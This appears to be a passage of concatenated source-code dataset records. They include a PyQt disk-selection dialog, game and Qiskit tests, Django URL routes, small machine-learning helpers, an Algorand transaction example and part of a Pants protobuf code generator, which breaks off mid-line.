available_bytes < self.required_mib_on_disk*1024*1024:\n item.setFlags(QtCore.Qt.ItemIsSelectable)\n self.disk_listwidget.addItem(item)\n self.old_ds = ds\n\n def onSelectionChanged(self):\n result = self.show_warning()\n button = self.button_box.button(QtWidgets.QDialogButtonBox.Ok)\n if result != None:\n print(\"User has agreed to erase the disk %s\" % result)\n button.setEnabled(True)\n else:\n print(\"User has not agreed to erase the disk\")\n button.setEnabled(False)\n self.disk_listwidget.clearSelection()\n\n def show_warning(self):\n if len(self.disk_listwidget.selectedItems()) != 1:\n return\n self.user_agreed_to_erase = False\n \n # Make a dialog box to ask the user if they really want to erase the disk\n dialog = QtWidgets.QMessageBox()\n dialog.setWindowTitle(tr(\"Warning\"))\n dialog.setText(tr(\"This will erase all contents of all partitions\\non this disk and format it.\\n\\nContinue?\"))\n dialog.setIcon(QtWidgets.QMessageBox.Warning)\n dialog.addButton(QtWidgets.QMessageBox.Yes)\n dialog.addButton(QtWidgets.QMessageBox.No)\n dialog.setDefaultButton(QtWidgets.QMessageBox.No)\n result = dialog.exec_()\n if result == QtWidgets.QMessageBox.Yes:\n print(\"User has agreed to erase the disk\")\n self.user_agreed_to_erase = True\n self.selected_disk = self.disk_listwidget.selectedItems()[0].text().split(\" \")[-3]\n return self.selected_disk\n else:\n print(\"User has not agreed to erase the disk\")\n self.disk_listwidget.clearSelection()\n self.user_agreed_to_erase = False\n self.selected_disk = None\n return None\n\nif __name__ == \"__main__\":\n # Wait for the user to click the OK button\n app.exec_()\n w = DiskSelectionWidget()\n w.show()\n # Print the selected disk to stdout\n if w.selected_disk != None:\n print(\"/dev/%s\" % w.selected_disk)\n else:\n print(\"No disk selected\")\n sys.exit(1)\n\n","sub_path":"System/Format Disk.app/Resources/selectdisk.py","file_name":"selectdisk.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206209859","text":"import use_cases\r\n\r\n\r\nclass DummyPresenter(use_cases.IPresenter):\r\n def __init__(self, data_to_return):\r\n self.index = 0\r\n self.data_to_return = data_to_return\r\n self.get_user_input_called = 0\r\n self.print_number_to_find = 0\r\n self.print_losing_message = 0\r\n\r\n def get_user_input(self):\r\n self.get_user_input_called += 1\r\n try:\r\n result = self.data_to_return[self.index]\r\n self.index += 1\r\n return result\r\n except TypeError:\r\n return self.data_to_return\r\n\r\n def present_number_to_find(self, number):\r\n self.print_number_to_find += 1\r\n\r\n def present_losing_message(self, set_number):\r\n self.print_losing_message += 1\r\n\r\n\r\nclass RandomGenerator(use_cases.IRandomGenerator):\r\n def __init__(self, datas):\r\n self.index = -1\r\n self.datas = datas\r\n\r\n def generate_int(self):\r\n self.index += 1\r\n return self.datas[self.index]\r\n\r\n\r\ndef test_loses_set_one():\r\n generator = RandomGenerator([1])\r\n presenter = DummyPresenter(data_to_return=2)\r\n usecase_play = use_cases.Play(i_presenter=presenter,\r\n i_number_generator=generator)\r\n usecase_play.run()\r\n assert usecase_play.response_model == {\"set\": 1}\r\n\r\n\r\ndef test_loses_at_set_2():\r\n generator = RandomGenerator([1, 2])\r\n presenter = DummyPresenter(data_to_return=[1, 1, 3])\r\n\r\n usecase_play = use_cases.Play(i_presenter=presenter,\r\n i_number_generator=generator)\r\n\r\n usecase_play.run()\r\n assert usecase_play.response_model == {\"set\": 2}\r\n\r\n\r\ndef test_loses_at_set_3():\r\n generator = RandomGenerator([1, 2, 3])\r\n presenter = DummyPresenter(data_to_return=[1, 1, 2, 4])\r\n\r\n usecase_play = use_cases.Play(i_presenter=presenter,\r\n i_number_generator=generator)\r\n\r\n usecase_play.run()\r\n assert usecase_play.response_model == {\"set\": 3}\r\n\r\n","sub_path":"test_use_case_game.py","file_name":"test_use_case_game.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"233893570","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2020, 2023.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\" Test Numerical qEOM excited states calculation \"\"\"\n\nfrom __future__ import annotations\n\nimport unittest\nimport warnings\n\nfrom test import QiskitNatureTestCase\nfrom ddt import ddt, named_data\nimport numpy as np\n\nfrom qiskit.algorithms.eigensolvers import NumPyEigensolver\nfrom qiskit.algorithms.minimum_eigensolvers import NumPyMinimumEigensolver\nfrom qiskit.algorithms.optimizers import SLSQP\nfrom qiskit.primitives import Estimator\nfrom qiskit.utils import algorithm_globals\n\nfrom qiskit_nature.units import DistanceUnit\nfrom qiskit_nature.second_q.circuit.library import UCCSD\nfrom qiskit_nature.second_q.transformers import ActiveSpaceTransformer\nfrom qiskit_nature.second_q.drivers import PySCFDriver\nfrom qiskit_nature.second_q.mappers import (\n BravyiKitaevMapper,\n JordanWignerMapper,\n ParityMapper,\n QubitMapper,\n TaperedQubitMapper,\n)\n\nfrom qiskit_nature.second_q.mappers import QubitConverter\nfrom qiskit_nature.second_q.algorithms import (\n GroundStateEigensolver,\n VQEUCCFactory,\n NumPyEigensolverFactory,\n ExcitedStatesEigensolver,\n QEOM,\n)\nimport qiskit_nature.optionals as _optionals\n\n\n@ddt\nclass TestNumericalQEOMESCCalculation(QiskitNatureTestCase):\n \"\"\"Test Numerical qEOM excited states calculation\"\"\"\n\n @unittest.skipIf(not _optionals.HAS_PYSCF, \"pyscf not available.\")\n def setUp(self):\n super().setUp()\n algorithm_globals.random_seed = 8\n self.driver = PySCFDriver(\n atom=\"H .0 .0 .0; H .0 .0 0.75\",\n unit=DistanceUnit.ANGSTROM,\n charge=0,\n spin=0,\n basis=\"sto3g\",\n )\n\n self.reference_energies = [\n -1.8427016,\n -1.8427016 + 0.5943372,\n -1.8427016 + 0.95788352,\n -1.8427016 + 1.5969296,\n ]\n self.mapper = JordanWignerMapper()\n self.qubit_converter = QubitConverter(self.mapper)\n self.electronic_structure_problem = self.driver.run()\n self.num_particles = self.electronic_structure_problem.num_particles\n\n solver = NumPyEigensolver()\n self.ref = solver\n\n def _assert_energies(self, computed, references, *, places=4):\n with self.subTest(\"same number of energies\"):\n self.assertEqual(len(computed), len(references))\n\n with self.subTest(\"ground state\"):\n self.assertAlmostEqual(computed[0], references[0], places=places)\n\n for i in range(1, len(computed)):\n with self.subTest(f\"{i}. excited state\"):\n self.assertAlmostEqual(computed[i], references[i], places=places)\n\n def _compute_and_assert_qeom_energies(self, mapper: QubitConverter | QubitMapper):\n estimator = Estimator()\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n gsc = GroundStateEigensolver(mapper, solver)\n esc = QEOM(gsc, estimator, \"sd\")\n results = esc.solve(self.electronic_structure_problem)\n self._assert_energies(results.computed_energies, self.reference_energies)\n\n def test_numpy_mes(self):\n \"\"\"Test NumPyMinimumEigenSolver with QEOM\"\"\"\n solver = NumPyMinimumEigensolver()\n gsc = GroundStateEigensolver(self.qubit_converter, solver)\n esc = QEOM(gsc, Estimator(), \"sd\")\n results = esc.solve(self.electronic_structure_problem)\n self._assert_energies(results.computed_energies, self.reference_energies)\n\n @named_data(\n [\"JWM\", QubitConverter(JordanWignerMapper())],\n [\"JWM_Z2\", QubitConverter(JordanWignerMapper(), z2symmetry_reduction=\"auto\")],\n [\"PM\", QubitConverter(ParityMapper())],\n [\"PM_TQR\", QubitConverter(ParityMapper(), two_qubit_reduction=True)],\n [\"PM_Z2\", QubitConverter(ParityMapper(), z2symmetry_reduction=\"auto\")],\n [\n \"PM_TQR_Z2\",\n QubitConverter(ParityMapper(), two_qubit_reduction=True, z2symmetry_reduction=\"auto\"),\n ],\n [\"BKM\", QubitConverter(BravyiKitaevMapper())],\n [\"BKM_Z2\", QubitConverter(BravyiKitaevMapper(), z2symmetry_reduction=\"auto\")],\n )\n def test_solve_with_vqe_mes(self, converter: QubitConverter):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitConverter\"\"\"\n self._compute_and_assert_qeom_energies(converter)\n\n @named_data(\n [\"JWM\", JordanWignerMapper()],\n [\"PM\", ParityMapper()],\n [\"PM_TQR\", ParityMapper(num_particles=(1, 1))],\n )\n def test_solve_with_vqe_mes_mapper(self, mapper: QubitMapper):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitMapper\"\"\"\n self._compute_and_assert_qeom_energies(mapper)\n\n @named_data(\n [\"JW\", lambda n, esp: TaperedQubitMapper(JordanWignerMapper())],\n [\"JW_Z2\", lambda n, esp: esp.get_tapered_mapper(JordanWignerMapper())],\n [\"PM\", lambda n, esp: TaperedQubitMapper(ParityMapper())],\n [\"PM_Z2\", lambda n, esp: esp.get_tapered_mapper(ParityMapper())],\n [\"PM_TQR\", lambda n, esp: TaperedQubitMapper(ParityMapper(n))],\n [\"PM_TQR_Z2\", lambda n, esp: esp.get_tapered_mapper(ParityMapper(n))],\n )\n def test_solve_with_vqe_mes_taperedmapper(self, tapered_mapper_creator):\n \"\"\"Test QEOM with VQEUCCFactory and various QubitMapper\"\"\"\n tapered_mapper = tapered_mapper_creator(\n self.num_particles, self.electronic_structure_problem\n )\n self._compute_and_assert_qeom_energies(tapered_mapper)\n\n def test_numpy_factory(self):\n \"\"\"Test NumPyEigenSolverFactory with ExcitedStatesEigensolver\"\"\"\n\n # pylint: disable=unused-argument\n def filter_criterion(eigenstate, eigenvalue, aux_values):\n return np.isclose(aux_values[\"ParticleNumber\"][0], 2.0)\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc = ExcitedStatesEigensolver(self.qubit_converter, solver)\n results = esc.solve(self.electronic_structure_problem)\n\n # filter duplicates from list\n computed_energies = [results.computed_energies[0]]\n for comp_energy in results.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies[-1]):\n computed_energies.append(comp_energy)\n\n self._assert_energies(computed_energies, self.reference_energies)\n\n def test_custom_filter_criterion(self):\n \"\"\"Test NumPyEigenSolverFactory with ExcitedStatesEigensolver + Custom filter criterion\n for doublet states\"\"\"\n\n driver = PySCFDriver(\n atom=\"Be .0 .0 .0; H .0 .0 0.75\",\n unit=DistanceUnit.ANGSTROM,\n charge=0,\n spin=1,\n basis=\"sto3g\",\n )\n\n transformer = ActiveSpaceTransformer((1, 2), 4)\n # We define an ActiveSpaceTransformer to reduce the duration of this test example.\n\n converter = QubitConverter(JordanWignerMapper(), z2symmetry_reduction=\"auto\")\n\n esp = transformer.transform(driver.run())\n\n expected_spin = 0.75 # Doublet states\n expected_num_electrons = 3 # 1 alpha electron + 2 beta electrons\n\n # pylint: disable=unused-argument\n def custom_filter_criterion(eigenstate, eigenvalue, aux_values):\n num_particles_aux = aux_values[\"ParticleNumber\"][0]\n total_angular_momentum_aux = aux_values[\"AngularMomentum\"][0]\n\n return np.isclose(total_angular_momentum_aux, expected_spin) and np.isclose(\n num_particles_aux, expected_num_electrons\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=custom_filter_criterion)\n esc = ExcitedStatesEigensolver(converter, solver)\n results = esc.solve(esp)\n\n # filter duplicates from list\n computed_energies = [results.computed_energies[0]]\n for comp_energy in results.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies[-1]):\n computed_energies.append(comp_energy)\n\n ref_energies = [\n -2.6362023196223254,\n -2.2971398524128923,\n -2.2020252702733165,\n -2.1044859216523752,\n -1.696132447109807,\n -1.6416831059956618,\n ]\n\n self._assert_energies(computed_energies, ref_energies, places=3)\n\n @unittest.skipIf(not _optionals.HAS_PYSCF, \"pyscf not available.\")\n def test_solver_compatibility_with_mappers(self):\n \"\"\"Test that solvers can use both QubitConverter and QubitMapper\"\"\"\n\n # pylint: disable=unused-argument\n def filter_criterion(eigenstate, eigenvalue, aux_values):\n return np.isclose(aux_values[\"ParticleNumber\"][0], 2.0)\n\n with self.subTest(\"Excited states solver with qubit converter\"):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc_converter = ExcitedStatesEigensolver(self.qubit_converter, solver)\n results_converter = esc_converter.solve(self.electronic_structure_problem)\n computed_energies_converter = [results_converter.computed_energies[0]]\n # filter duplicates from list\n for comp_energy in results_converter.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies_converter[-1]):\n computed_energies_converter.append(comp_energy)\n self._assert_energies(computed_energies_converter, self.reference_energies)\n\n with self.subTest(\"Excited states solver with qubit mapper\"):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = NumPyEigensolverFactory(filter_criterion=filter_criterion)\n esc_mapper = ExcitedStatesEigensolver(self.mapper, solver)\n results_mapper = esc_mapper.solve(self.electronic_structure_problem)\n # filter duplicates from list\n computed_energies_mapper = [results_mapper.computed_energies[0]]\n for comp_energy in results_mapper.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies_mapper[-1]):\n computed_energies_mapper.append(comp_energy)\n self._assert_energies(computed_energies_mapper, self.reference_energies)\n\n with self.subTest(\"QEOM with qubit converter\"):\n estimator = Estimator()\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n gsc_converter = GroundStateEigensolver(self.qubit_converter, solver)\n esc_converter = QEOM(gsc_converter, estimator, \"sd\")\n results_converter = esc_converter.solve(self.electronic_structure_problem)\n # filter duplicates from list\n computed_energies_converter = [results_converter.computed_energies[0]]\n for comp_energy in results_converter.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies_converter[-1]):\n computed_energies_converter.append(comp_energy)\n self._assert_energies(computed_energies_converter, self.reference_energies)\n\n with self.subTest(\"QEOM with qubit mapper\"):\n estimator = Estimator()\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=DeprecationWarning)\n solver = VQEUCCFactory(estimator, UCCSD(), SLSQP())\n gsc_mapper = GroundStateEigensolver(self.mapper, solver)\n esc_mapper = QEOM(gsc_mapper, estimator, \"sd\")\n results_mapper = esc_mapper.solve(self.electronic_structure_problem)\n # filter duplicates from list\n computed_energies_mapper = [results_mapper.computed_energies[0]]\n for comp_energy in results_mapper.computed_energies[1:]:\n if not np.isclose(comp_energy, computed_energies_mapper[-1]):\n computed_energies_mapper.append(comp_energy)\n self._assert_energies(computed_energies_mapper, self.reference_energies)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/second_q/algorithms/excited_state_solvers/test_excited_states_solvers.py","file_name":"test_excited_states_solvers.py","file_ext":"py","file_size_in_byte":13018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77139685","text":"from django.conf.urls import url\nfrom snippets import views, user_views, api_views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# urlpatterns = [\n#\n#\n#\n# ]\n\nurlpatterns = [\n\n url(r'^$', api_views.api_root),\n\n url(r'^api/v1/user/$', user_views.UserListView.as_view(), name='user-list'),\n url(r'^api/v1/user/detail/(?P[1-9]+)/$', user_views.UserDetailView.as_view(), name='user-detail'),\n\n # 1.\n # url(r'^api/v1/list/$', views.snippet_list, name='snippet-list'),\n # url(r'^api/v1/detail/(?P[1-9]+)/$', views.snippet_detail, name='snippet-detail'),\n\n # 2.\n url(r'^api/v1/list/$', views.snippet_list1, name='snippet-list'),\n url(r'^api/v1/detail/(?P[1-9]+)/$', views.snippet_detail1, name='snippet-detail'),\n\n # 3.\n # url(r'^api/v1/list/$', views.SnippetsListCreateView.as_view(), name='snippet-list'),\n # url(r'^api/v1/detail/(?P[1-9]+)/$', views.SnippetsDetailView.as_view(), name='snippet-detail'),\n\n # 4.\n # url(r'^api/v1/list/$', views.SnippetsListView1.as_view(), name='snippet-list'),\n # url(r'^api/v1/detail/(?P[1-9]+)/$', views.SnippetsDetailView1.as_view(), name='snippet-detail'),\n\n url(r'^api/v1/snippets/(?P[1-9]+)/highlight/$', views.SnippetsHighlightView.as_view(), name='snippet-highlight'),\n\n # 5.\n # url(r'^api/v1/list/$', views.SnippetsListView1=2.as_view(), name='snippet-list'),\n # url(r'^api/v1/detail/(?P[1-9]+)/$', views.SnippetsDetailView2.as_view(), name='snippet-detail'),\n\n]\n\n# 路由后缀配置\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640448588","text":"import numpy as np\nimport argparse\nimport random\n\nclass ChineseWordVector(object):\n def __init__(self, vector_file, topn = 10000):\n self.vector_file = vector_file\n self.topn = topn\n self.vector_matrix, self.index2word, self.word2index = self.get_vector_matrix()\n\n def get_vector_matrix():\n vectors, iw, wi, dim = self.read_vectors()\n # Turn vectors into numpy format and normalize them\n matrix = np.zeros(shape=(len(iw), dim), dtype=np.float32)\n for i, word in enumerate(iw):\n matrix[i, :] = vectors[word]\n matrix = normalize(matrix)\n return matrix, iw, wi\n\n def read_vectors(): # read top n word vectors, i.e. top is 10000\n lines_num, dim = 0, 0\n vectors = {}\n iw = []\n wi = {}\n with open(self.vector_file, encoding='utf-8', errors='ignore') as f:\n first_line = True\n for line in f:\n if first_line:\n first_line = False\n dim = int(line.rstrip().split()[1])\n continue\n lines_num += 1\n tokens = line.rstrip().split(' ')\n vectors[tokens[0]] = np.asarray([float(x) for x in tokens[1:]])\n iw.append(tokens[0])\n if self.topn != 0 and lines_num >= self.topn:\n break\n for i, w in enumerate(iw):\n wi[w] = i\n return vectors, iw, wi, dim\n\n def normalize(matrix):\n norm = np.sqrt(np.sum(matrix * matrix, axis=1))\n matrix = matrix / norm[:, np.newaxis]\n return matrix\n\n def get_similarity_matrix(word):\n if word in self.word2index:\n matrix = self.vector_matrix[word2index[word]]","sub_path":"brain/word_vectors_Chinese_Word_Vectors.py","file_name":"word_vectors_Chinese_Word_Vectors.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"449697822","text":"\nfrom sklearn.svm import SVC\nimport numpy as np\n\nclass CustomSVC:\n\tdef gaussian_matrix(x1, x2, sigma=0.1):\n\t\tgram_matrix = np.zeros((x1.shape[0], x2.shape[0]))\n\t\tfor (i, x1) in enumerate(x1):\n\t\t\tfor (j, x2) in enumerate(x2):\n\t\t\t\tx1 = x1.flatten()\n\t\t\t\tx2 = x2.flatten()\n\t\t\t\tgram_matriix[i,j] = np.exp(-np.sum(x2), 2) / float(2*(sigma**2))\n\t\treturn gram_matrix\n\n\tdef build(x, y):\n\t\tmodel = SVC(C=0.1, kernel=\"precomputed\")\n\t\tmodel.fit(self.gaussian_matrix(x, x), y)\n\t\treturn model\n\n\tdef predict(model, trainX, testX):\n\t\tmodel.predict(self.gaussian_matrix(testX, trainX))\n\t\treturn model\n\n\n\n","sub_path":"Face Recognition with SVC and MLP/svc/customsvc.py","file_name":"customsvc.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218866439","text":"from collections import OrderedDict\n\nfrom algosdk import algod, constants, encoding\nfrom algosdk.transaction import Transaction\n\n\nclass MessageTransaction(Transaction):\n def __init__(self, sender, receiver, fee, first, last, gen, gh, note, flat_fee=False):\n Transaction.__init__(self, sender, fee, first, last, note, gen, gh,\n None, constants.payment_txn)\n self.receiver = receiver\n if flat_fee:\n self.fee = max(constants.min_txn_fee, self.fee)\n else:\n self.fee = max(self.estimate_size() * self.fee,\n constants.min_txn_fee)\n\n def dictify(self):\n d = dict()\n d[\"rcv\"] = encoding.decode_address(self.receiver)\n\n d.update(super(MessageTransaction, self).dictify())\n od = OrderedDict(sorted(d.items()))\n\n return od\n\n @staticmethod\n def _undictify(d):\n args = {\n \"receiver\": encoding.encode_address(d[\"rcv\"])\n }\n return args\n\n\nalgod_token = \"7ae5d632c33fe9d30b22e459d4b3b883b6c9e359cc6686111acb91224c211f76\"\nalgod_address = \"http://localhost:35111\"\n\n# create an algod client\nacl = algod.AlgodClient(algod_token, algod_address)\n\n# get suggested parameters\nparams = acl.suggested_params()\ngen = params[\"genesisID\"]\ngh = params[\"genesishashb64\"]\nlast_round = params[\"lastRound\"]\nfee = params[\"fee\"]\n\nsender = \"RLVMMCZHDCKVGBBAHJPALUY7VNTCDJRZ2P3Y73FCE45Q2KHKEFQZ6Q3VW4\"\nreceiver = \"TIT4WWEEDXBXD4ILJUPECEUCYJ34JK6PFT2ZS6AXWRF3XBWSUCNOUQYW44\"\nsk = \"Vfo4VpjmwtPFry+bowu/VNv/iVHXucJRiQ/D/KRV/6KK6sYLJxiVUwQgOl4F0x+rZiGmOdP3j+yiJzsNKOohYQ==\"\n\n# create a transaction\nmessage = bytes(\"Hello, world!\", \"utf-8\")\ntxn = MessageTransaction(sender, receiver, fee, last_round, last_round + 100, gen, gh, message)\n\n# sign it\nstx = txn.sign(sk)\n\n# send it\ntxid = acl.send_transaction(stx)\n","sub_path":"examples/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583103429","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (nested_scopes, generators, division, absolute_import, with_statement,\n print_function, unicode_literals)\n\nfrom collections import defaultdict\nfrom hashlib import sha1\nimport os\nimport re\nimport subprocess\n\nfrom twitter.common import log\nfrom twitter.common.collections import OrderedDict, OrderedSet, maybe_list\n\nfrom pants.backend.codegen.targets.java_protobuf_library import JavaProtobufLibrary\nfrom pants.backend.codegen.tasks.code_gen import CodeGen\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.backend.jvm.targets.java_library import JavaLibrary\nfrom pants.backend.python.targets.python_library import PythonLibrary\nfrom pants.base.address import SyntheticAddress\nfrom pants.base.address_lookup_error import AddressLookupError\nfrom pants.base.build_environment import get_buildroot\nfrom pants.base.exceptions import TaskError\nfrom pants.base.target import Target\nfrom pants.binary_util import BinaryUtil\nfrom pants.fs.archive import ZIP\nfrom pants.util.dirutil import safe_mkdir\n\n# Override with protobuf-gen -> supportdir\n_PROTOBUF_GEN_SUPPORTDIR_DEFAULT='bin/protobuf'\n\n# Override with protobuf-gen -> version\n_PROTOBUF_VERSION_DEFAULT='2.4.1'\n\n# Override with protobuf-gen -> javadeps (Accepts a list)\n_PROTOBUF_GEN_JAVADEPS_DEFAULT='3rdparty:protobuf-{version}'\n\n# Override with in protobuf-gen -> pythondeps (Accepts a list)\n_PROTOBUF_GEN_PYTHONDEPS_DEFAULT = []\n\nclass ProtobufGen(CodeGen):\n\n @classmethod\n def setup_parser(cls, option_group, args, mkflag):\n option_group.add_option(mkflag('lang'), dest='protobuf_gen_langs', default=[],\n action='append', type='choice', choices=['python', 'java'],\n help='Force generation of protobuf code for these languages.')\n\n def __init__(self, *args, **kwargs):\n super(ProtobufGen, self).__init__(*args, **kwargs)\n\n self.protoc_supportdir = self.context.config.get('protobuf-gen', 'supportdir',\n default=_PROTOBUF_GEN_SUPPORTDIR_DEFAULT)\n self.protoc_version = self.context.config.get('protobuf-gen', 'version',\n default=_PROTOBUF_VERSION_DEFAULT)\n self.plugins = self.context.config.getlist('protobuf-gen', 'plugins', default=[])\n\n self.java_out = os.path.join(self.workdir, 'gen-java')\n self.py_out = os.path.join(self.workdir, 'gen-py')\n\n self.gen_langs = set(self.context.options.protobuf_gen_langs)\n for lang in ('java', 'python'):\n if self.context.products.isrequired(lang):\n self.gen_langs.add(lang)\n\n self.protobuf_binary = BinaryUtil(config=self.context.config).select_binary(\n self.protoc_supportdir,\n self.protoc_version,\n 'protoc'\n )\n\n # TODO https://github.com/pantsbuild/pants/issues/604 prep start\n def prepare(self, round_manager):\n super(ProtobufGen, self).prepare(round_manager)\n round_manager.require_data('ivy_imports')\n # TODO https://github.com/pantsbuild/pants/issues/604 prep finish\n\n def resolve_deps(self, key, default=[]):\n deps = OrderedSet()\n for dep in self.context.config.getlist('protobuf-gen', key, default=maybe_list(default)):\n if dep:\n try:\n deps.update(self.context.resolve(dep))\n except AddressLookupError as e:\n raise self.DepLookupError(\"{message}\\n referenced from [{section}] key: {key} in pants.ini\"\n .format(message=e, section='protobuf-gen', key=key))\n return deps\n\n @property\n def javadeps(self):\n return self.resolve_deps('javadeps',\n default=_PROTOBUF_GEN_JAVADEPS_DEFAULT\n .format(version=self.protoc_version))\n @property\n def pythondeps(self):\n return self.resolve_deps('pythondeps', default=_PROTOBUF_GEN_PYTHONDEPS_DEFAULT)\n\n def invalidate_for_files(self):\n return [self.protobuf_binary]\n\n def is_gentarget(self, target):\n return isinstance(target, JavaProtobufLibrary)\n\n def is_forced(self, lang):\n return lang in self.gen_langs\n\n def genlangs(self):\n return Target.LANG_DISCRIMINATORS\n\n def _jars_to_directories(self, target):\n \"\"\"Extracts and maps jars to directories containing their contents.\n\n :returns: a set of filepaths to directories containing the contents of jar.\n \"\"\"\n files = set()\n jarmap = self.context.products.get('ivy_imports')\n for folder, names in jarmap.by_target[target].items():\n for name in names:\n files.add(self._extract_jar(os.path.join(folder, name)))\n return files\n\n def _extract_jar(self, jar_path):\n \"\"\"Extracts the jar to a subfolder of workdir/extracted and returns the path to it.\"\"\"\n with open(jar_path, 'rb') as f:\n outdir = os.path.join(self.workdir, 'extracted', sha1(f.read()).hexdigest())\n if not os.path.exists(outdir):\n ZIP.extract(jar_path, outdir)\n self.context.log.debug('Extracting jar at {jar_path}.'.format(jar_path=jar_path))\n else:\n self.context.log.debug('Jar already extracted at {jar_path}.'.format(jar_path=jar_path))\n return outdir\n\n def _proto_path_imports(self, proto_targets):\n for target in proto_targets:\n for path in self._jars_to_directories(target):\n yield os.path.relpath(path, get_buildroot())\n\n def _same_contents(self, a, b):\n with open(a, 'r') as f:\n a_data = f.read()\n with open(b, 'r') as f:\n b_data = f.read()\n return a_data == b_data\n\n def genlang(self, lang, targets):\n sources_by_base = self._calculate_sources(targets)\n sources = reduce(lambda a,b: a^b, sources_by_base.values(), OrderedSet())\n bases = OrderedSet(sources_by_base.keys())\n bases.update(self._proto_path_imports(targets))\n\n # Check for duplicate/conflicting protos.\n sources_by_genfile = {}\n for base in sources_by_base.keys(): # Need to iterate over /original/ bases.\n for path in sources_by_base[base]:\n if not path in sources:\n continue # Check to make sure we haven't already removed it.\n source = path[len(base):]\n genfiles = calculate_genfiles(path, source)\n for key in genfiles.keys():\n for genfile in genfiles[key]:\n if genfile in sources_by_genfile:\n # Possible conflict!\n prev = sources_by_genfile[genfile]\n if not prev in sources:\n # Must have been culled by an earlier pass.\n continue\n if not self._same_contents(path, prev):\n self.context.log.error('Proto conflict detected (.proto files are different):')\n self.context.log.error(' 1: {prev}'.format(prev=prev))\n self.context.log.error(' 2: {curr}'.format(curr=path))\n else:\n self.context.log.warn('Proto duplication detected (.proto files are identical):')\n self.context.log.warn(' 1: {prev}'.format(prev=prev))\n self.context.log.warn(' 2: {curr}'.format(curr=path))\n self.context.log.warn(' Arbitrarily favoring proto 1.')\n if path in sources:\n sources.remove(path) # Favor the first version.\n continue\n sources_by_genfile[genfile] = path\n\n if lang == 'java':\n output_dir = self.java_out\n gen_flag = '--java_out'\n elif lang == 'python':\n output_dir = self.py_out\n gen_flag = '--python_out'\n else:\n raise TaskError('Unrecognized protobuf gen lang: %s' % lang)\n\n safe_mkdir(output_dir)\n gen = '%s=%s' % (gen_flag, output_dir)\n\n args = [self.protobuf_binary, gen]\n\n if self.plugins:\n for plugin in self.plugins:\n # TODO(Eric Ayers) Is it a good assumption that the generated source output dir is\n # acceptable for all plugins?\n args.append(\"--%s_protobuf_out=%s\" % (plugin, output_dir))\n\n for base in bases:\n args.append('--proto_path=%s' % base)\n\n args.extend(sources)\n log.debug('Executing: %s' % '\\\\\\n '.join(args))\n process = subprocess.Popen(args)\n result = process.wait()\n if result != 0:\n raise TaskError('%s ... exited non-zero (%i)' % (self.protobuf_binary, result))\n\n def _calculate_sources(self, targets):\n walked_targets = set()\n for target in targets:\n walked_targets.update(t for t in target.closure() if self.is_gentarget(t))\n\n sources_by_base = OrderedDict()\n for target in self.context.build_graph.targets():\n if target in walked_targets:\n base, sources = target.target_base, target.sources_relative_to_buildroot()\n if base not in sources_by_base:\n sources_by_base[base] = OrderedSet()\n sources_by_base[base].update(sources)\n return sources_by_base\n\n def createtarget(self, lang, gentarget, dependees):\n if lang == 'java':\n return self._create_java_target(gentarget, dependees)\n elif lang == 'python':\n return self._create_python_target(gentarget, dependees)\n else:\n raise TaskError('Unrecognized protobuf gen lang: %s' % lang)\n\n def _create_java_target(self, target, dependees):\n genfiles = []\n for source in target.sources_relative_to_source_root():\n path = os.path.join(target.target_base, source)\n genfiles.extend(calculate_genfiles(path, source).get('java', []))\n spec_path = os.path.relpath(self.java_out, get_buildroot())\n address = SyntheticAddress(spec_path, target.id)\n deps = OrderedSet(self.javadeps)\n import_jars = target.imports\n jars_tgt = self.context.add_new_target(SyntheticAddress(spec_path, target.id+str('-rjars')),\n 